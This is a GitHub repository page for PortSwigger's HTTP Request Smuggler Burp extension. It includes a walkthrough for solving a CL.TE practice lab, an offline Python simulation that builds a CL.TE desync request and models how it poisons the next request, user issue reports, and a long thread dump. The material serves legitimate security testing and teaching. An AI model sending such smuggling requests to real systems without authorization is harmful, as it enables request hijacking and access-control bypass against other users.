
portswigger / http-request-smuggler


Home Page: https://portswigger.net/blog/http-desync-attacks

License: Other

Python 2.37% Java 96.96% HTML 0.47% Shell 0.20%

http-request-smuggler's Introduction

HTTP Request Smuggler

This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.

This extension should not be confused with Burp Suite HTTP Smuggler, which uses similar techniques but is focused exclusively on bypassing WAFs.

Install

The easiest way to install this is in Burp Suite, via Extender -> BApp Store.

If you prefer to load the jar manually, in Burp Suite (community or pro), use Extender -> Extensions -> Add to load build/libs/http-request-smuggler-all.jar

Compile

Turbo Intruder is a dependency of this project. Add it to the root of this source tree as turbo-intruder-all.jar

Build using:

Linux: ./gradlew build fatjar

Windows: gradlew.bat build fatjar

Grab the output from build/libs/desynchronize-all.jar

Use

Right click on a request and click Launch Smuggle probe, then watch the extension's output pane under Extender->Extensions->HTTP Request Smuggler

If you're using Burp Pro, any findings will also be reported as scan issues.

If you right click on a request that uses chunked encoding, you'll see another option marked Launch Smuggle attack. This will open a Turbo Intruder window in which you can try out various attacks by editing the prefix variable.

For more advanced use watch the video.

Practice

We've released a collection of free online labs to practise against. Here's how to use the tool to solve the first lab - HTTP request smuggling, basic CL.TE vulnerability:

  1. Use the Extender->BApp store tab to install the 'HTTP Request Smuggler' extension.
  2. Load the lab homepage, find the request in the proxy history, right click and select 'Launch smuggle probe', then click 'OK'.
  3. Wait for the probe to complete, indicated by 'Completed 1 of 1' appearing in the extension's output tab.
  4. If you're using Burp Suite Pro, find the reported vulnerability in the dashboard and open the first attached request.
  5. If you're using Burp Suite Community, copy the request from the output tab and paste it into the repeater, then complete the 'Target' details on the top right.
  6. Right click on the request and select 'Smuggle attack (CL.TE)'.
  7. Change the value of the 'prefix' variable to 'G', then click 'Attack' and confirm that one response says 'Unrecognised method GPOST'.

By changing the 'prefix' variable in step 7, you can solve all the labs and virtually every real-world scenario.
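What step 7 shows on the wire, as an added offline simulation (not code from the extension or from Turbo Intruder): the front-end frames the request by Content-Length, the back-end by Transfer-Encoding: chunked, so the prefix byte is left in the back-end's buffer and is glued onto the next request. The host `lab.example`, the function names and the modelled back-end responses are assumptions; the response text follows the message quoted in step 7.

```python
"""Offline model of the CL.TE desync behind step 7 (added example, no network I/O)."""

CRLF = b"\r\n"

# Constructed follow-up request from another client sharing the back-end connection.
VICTIM = (b"POST / HTTP/1.1" + CRLF + b"Host: lab.example" + CRLF +
          b"Content-Length: 3" + CRLF + CRLF + b"x=1")


def split_head(buf):
    """Parse the header block; return (request_line, headers, body_offset)."""
    head, sep, _ = buf.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, len(head) + 4


def frame_by_content_length(buf):
    """Front-end view: the body is exactly Content-Length bytes long."""
    _, headers, offset = split_head(buf)
    end = offset + int(headers.get(b"content-length", b"0"))
    if end > len(buf):
        raise ValueError("body shorter than Content-Length")
    return buf[:end], buf[end:]


def frame_by_chunked(buf):
    """Back-end view: chunked encoding wins; the body ends at the 0-size chunk."""
    _, headers, pos = split_head(buf)
    if headers.get(b"transfer-encoding", b"").lower() != b"chunked":
        return frame_by_content_length(buf)
    while True:
        eol = buf.index(CRLF, pos)
        size = int(buf[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        pos += size + 2  # chunk data plus its trailing CRLF
    while True:  # skip optional trailers up to the blank line
        eol = buf.index(CRLF, pos)
        blank = eol == pos
        pos = eol + 2
        if blank:
            return buf[:pos], buf[pos:]


def cl_te_request(prefix, host=b"lab.example"):
    """Request with both headers; Content-Length must also count the prefix."""
    body = b"0" + CRLF + CRLF + prefix
    return (b"POST / HTTP/1.1" + CRLF + b"Host: " + host + CRLF +
            b"Content-Length: " + str(len(body)).encode() + CRLF +
            b"Transfer-Encoding: chunked" + CRLF + CRLF + body)


def simulate(client_requests, reject_ambiguous=False):
    """Forward each client request through the front-end, then let the
    back-end re-split the shared byte stream. Returns back-end responses."""
    backend_buf = b""
    for raw in client_requests:
        _, headers, _ = split_head(raw)
        ambiguous = b"content-length" in headers and b"transfer-encoding" in headers
        if reject_ambiguous and ambiguous:
            continue  # hardened front-end: refuse the request, forward nothing
        request, _ = frame_by_content_length(raw)
        backend_buf += request
    responses = []
    while backend_buf:
        request, backend_buf = frame_by_chunked(backend_buf)
        method = split_head(request)[0].split(b" ")[0].decode()
        known = method in ("GET", "POST")  # modelled back-end behaviour (assumption)
        responses.append("200 OK" if known else "Unrecognised method " + method)
    return responses


if __name__ == "__main__":
    probe = cl_te_request(b"G")
    print(probe.decode())
    print(simulate([probe, VICTIM]))
    print(simulate([probe, VICTIM], reject_ambiguous=True))
```

With `reject_ambiguous=True` the front-end refuses any request that carries both Content-Length and Transfer-Encoding, and the follow-up request reaches the back-end unmodified.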

http-request-smuggler's People

Contributors

albinowax, hannah-portswigger, lol768, michael-eaton-portswigger, portswiggersupport


http-request-smuggler's Issues

"Convert to chunked" broken ?

Hello,

I'm trying to manually "Convert to chunked" in Burp Repeater, and it does not do anything: the request is not modified. Is there an issue with the plugin?

The Burp version in use is the latest in the early adopter branch (if I'm not mistaken): v2021.8.3-9673
HTTP Request Smuggler v2.01. I just reinstalled it, unloaded all the other extensions and restarted Burp, same thing.

Thanks in advance.

Cheers,

A.

Launch Smuggler Probe Fails To Detect Vulnerability on Basic Web Academy Lab

I'm running a clean install of Burp Suite Pro Version on Kali Linux and attempting to test the HTTP Request Smuggler Probe on the PortSwigger Web Academy Request Smuggler Lab 1.

After launching the probe, the output pane in the extender tab shows the requests constantly timing out and saying 'Unexpected Report With Response'.

Notably, running the extension on the community edition of Burp on both Kali Linux and MacOS detects the vulnerability in the lab. It's possible I have something strange going on with my install, but I would love it if someone could verify this issue or lack of it on their end with the same setup.

Update: the extension will work when only itself and Turbo Intruder are loaded. Once Param Miner is loaded the extension seems to fail although the culprit for the failure could be linked to any of the following loaded extensions at time of testing:
Active Scan++
Backslash Powered Scanner
Upload Scanner

I have some problems. Can you give me some advice?

I read your article and I know how to test request smuggling. But according to your method, send an attacker's request and then send a large number of victim's requests. But when I send a large number of victim's requests, there are some problems. When I use request smuggler(TE.CL) and turbo intruder, it simply sends a large number of attacker's requests. I sent an attacker request like this
[image: 3_LI]
When I put this request in the repeater module, it returned 200 ok. But when I attacked
[image: 4_LI]
I can't get the 404 result I want. Because all requests are repeated attacker requests, None of them are normal requests. I was really confused. What should I do? How should I use this extension??

Unable to install extension via BApp Store

I am trying to install the extension in Burp Suite running on Windows 10 32 bit, but the status remains as "Installing" but never gets installed. I tried it multiple times, both on Burp Suite Professional and Community version, but no luck.

Smuggle attack script doesn't fix the Content-Length header.

When I'm doing a hopefully404 confirm test, the request content-Length will always be the same value as the original request, in my test case it's "Content-Length: 11", but in your demo video I notice that there is a "Content-Length: 44", which has been fixed.

The comment says that "The request engine will auto-fix the content-length for us", maybe something wrong with my settings?

I've already checked the update Content-Length feature in both Repeater and Proxy-Options-Intercept Client Requests.

Smuggle probe does not run any tests

Running the Smuggle Probe on lab 1 HTTP request smuggling, basic CL.TE vulnerability does not start any tests. In the plugin logs, I only see:

Using albinowaxUtils v1.02
This extension should be run on the latest version of Burp Suite. Using an older version of Burp may cause impaired functionality.
Loaded HTTP Request Smuggler v2.02
Updating active thread pool size to 8
Loop 0
Queued 0 attacks from 1 requests in 0 seconds

Diagnostic info:

        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-14-thread-1
    native=false, suspended=false, block=0, wait=2
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@661e3c5d owned by null (-1), cpu=28, user=26
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-1
    native=false, suspended=false, block=136, wait=130
    lock=java.lang.Object@4ff47ac7 owned by null (-1), cpu=48, user=43
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-2
    native=false, suspended=false, block=21, wait=13
    lock=java.lang.Object@59b52f4d owned by null (-1), cpu=63, user=58
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-3
    native=false, suspended=false, block=26, wait=18
    lock=java.lang.Object@388592eb owned by null (-1), cpu=97, user=91
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-4
    native=false, suspended=false, block=30, wait=23
    lock=java.lang.Object@2f6ebd72 owned by null (-1), cpu=25, user=24
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-5
    native=false, suspended=false, block=23, wait=21
    lock=java.lang.Object@4320d81a owned by null (-1), cpu=6, user=5
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-6
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@339f5874 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-7
    native=false, suspended=false, block=24, wait=24
    lock=java.lang.Object@27998626 owned by null (-1), cpu=7, user=6
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-8
    native=false, suspended=false, block=24, wait=24
    lock=java.lang.Object@7d462a8a owned by null (-1), cpu=1, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-9
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@38e3cd30 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-10
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@71766ea0 owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

passive-worker-11
    native=false, suspended=false, block=23, wait=24
    lock=java.lang.Object@1a356e1e owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.e3t.run(Unknown Source)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-21-thread-1
    native=false, suspended=false, block=0, wait=20
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@566b05a8 owned by null (-1), cpu=8, user=6
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-18-thread-1
    native=false, suspended=false, block=0, wait=49
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@70c7c818 owned by null (-1), cpu=2, user=2
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-20-thread-1
    native=false, suspended=false, block=7, wait=53
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@3286abce owned by null (-1), cpu=2, user=2
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1170)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-1
    native=false, suspended=false, block=0, wait=3
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@372761e owned by null (-1), cpu=4, user=4
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        app//burp.eik.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-2
    native=true, suspended=false, block=2, wait=6
    lock=null owned by null (-1), cpu=965, user=554
        [email protected]/sun.nio.ch.Net.poll(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.park(NioSocketImpl.java:181)
        [email protected]/sun.nio.ch.NioSocketImpl.timedRead(NioSocketImpl.java:285)
        [email protected]/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:309)
        [email protected]/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:350)
        [email protected]/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:803)
        [email protected]/java.net.Socket$SocketInputStream.read(Socket.java:966)
        app//burp.ba8.read(Unknown Source)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.read(SSLSocketInputRecord.java:478)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.readHeader(SSLSocketInputRecord.java:472)
        [email protected]/sun.security.ssl.SSLSocketInputRecord.bytesInCompletePacket(SSLSocketInputRecord.java:70)
        [email protected]/sun.security.ssl.SSLSocketImpl.readApplicationRecord(SSLSocketImpl.java:1455)
        [email protected]/sun.security.ssl.SSLSocketImpl$AppInputStream.read(SSLSocketImpl.java:1059)
        app//burp.f2p.a(Unknown Source)
        app//burp.f2p.b(Unknown Source)
        app//burp.cy6.lambda$run$0(Unknown Source)
        app//burp.cy6$$Lambda$1363/0x0000000800b85668.a(Unknown Source)
        app//burp.eun.a(Unknown Source)
        app//burp.cy6.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-3
    native=true, suspended=false, block=4, wait=3
    lock=null owned by null (-1), cpu=5, user=4
        [email protected]/sun.nio.ch.Net.accept(Native Method)
        [email protected]/sun.nio.ch.NioSocketImpl.accept(NioSocketImpl.java:755)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:675)
        [email protected]/java.net.ServerSocket.platformImplAccept(ServerSocket.java:641)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:617)
        [email protected]/java.net.ServerSocket.implAccept(ServerSocket.java:574)
        [email protected]/java.net.ServerSocket.accept(ServerSocket.java:532)
        app//burp.gbt.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-4
    native=true, suspended=false, block=573, wait=603
    lock=null owned by null (-1), cpu=287, user=271
        [email protected]/java.io.FileInputStream.readBytes(Native Method)
        [email protected]/java.io.FileInputStream.read(FileInputStream.java:276)
        [email protected]/java.io.BufferedInputStream.read1(BufferedInputStream.java:282)
        [email protected]/java.io.BufferedInputStream.read(BufferedInputStream.java:343)
        [email protected]/sun.nio.cs.StreamDecoder.readBytes(StreamDecoder.java:270)
        [email protected]/sun.nio.cs.StreamDecoder.implRead(StreamDecoder.java:313)
        [email protected]/sun.nio.cs.StreamDecoder.read(StreamDecoder.java:188)
        [email protected]/java.io.InputStreamReader.read(InputStreamReader.java:177)
        [email protected]/java.io.BufferedReader.fill(BufferedReader.java:162)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:329)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:396)
        app//net.portswigger.devtools.client.f.lambda$logProcessOutput$5(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1313/0x0000000800aa61c8.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-5
    native=false, suspended=false, block=0, wait=1
    lock=java.util.LinkedList@d3a659d owned by null (-1), cpu=0, user=0
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        app//burp.chh.d(Unknown Source)
        app//burp.chh.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-6
    native=false, suspended=false, block=833, wait=870
    lock=java.lang.ProcessImpl@43f3fb2a owned by null (-1), cpu=164, user=88
        [email protected]/java.lang.Object.wait(Native Method)
        [email protected]/java.lang.Object.wait(Object.java:338)
        [email protected]/java.lang.ProcessImpl.waitFor(ProcessImpl.java:434)
        app//net.portswigger.devtools.client.f.lambda$new$4(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1314/0x0000000800aa63f0.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-7
    native=false, suspended=false, block=0, wait=1
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@442ce041 owned by null (-1), cpu=0, user=0
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.park(LockSupport.java:341)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionNode.block(AbstractQueuedSynchronizer.java:506)
        [email protected]/java.util.concurrent.ForkJoinPool.unmanagedBlock(ForkJoinPool.java:3463)
        [email protected]/java.util.concurrent.ForkJoinPool.managedBlock(ForkJoinPool.java:3434)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await(AbstractQueuedSynchronizer.java:1623)
        [email protected]/java.util.concurrent.LinkedBlockingQueue.take(LinkedBlockingQueue.java:435)
        app//burp.eik.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-24-thread-1
    native=false, suspended=false, block=0, wait=780
    lock=java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject@54febc5c owned by null (-1), cpu=125, user=102
        [email protected]/jdk.internal.misc.Unsafe.park(Native Method)
        [email protected]/java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:252)
        [email protected]/java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.awaitNanos(AbstractQueuedSynchronizer.java:1672)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:1182)
        [email protected]/java.util.concurrent.ScheduledThreadPoolExecutor$DelayedWorkQueue.take(ScheduledThreadPoolExecutor.java:899)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.getTask(ThreadPoolExecutor.java:1062)
        [email protected]/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1122)
        [email protected]/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
        [email protected]/java.lang.Thread.run(Thread.java:833)

pool-project-thread-8
    native=true, suspended=false, block=0, wait=1
    lock=null owned by null (-1), cpu=18, user=17
        [email protected]/java.io.FileInputStream.readBytes(Native Method)
        [email protected]/java.io.FileInputStream.read(FileInputStream.java:276)
        [email protected]/java.io.BufferedInputStream.read1(BufferedInputStream.java:282)
        [email protected]/java.io.BufferedInputStream.read(BufferedInputStream.java:343)
        [email protected]/sun.nio.cs.StreamDecoder.readBytes(StreamDecoder.java:270)
        [email protected]/sun.nio.cs.StreamDecoder.implRead(StreamDecoder.java:313)
        [email protected]/sun.nio.cs.StreamDecoder.read(StreamDecoder.java:188)
        [email protected]/java.io.InputStreamReader.read(InputStreamReader.java:177)
        [email protected]/java.io.BufferedReader.fill(BufferedReader.java:162)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:329)
        [email protected]/java.io.BufferedReader.readLine(BufferedReader.java:396)
        app//net.portswigger.devtools.client.f.lambda$logProcessOutput$5(Unknown Source)
        app//net.portswigger.devtools.client.f$$Lambda$1313/0x0000000800aa61c8.run(Unknown Source)
        [email protected]/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
        [email protected]/java.util.concurrent.FutureTask.run(FutureTask.java:264)
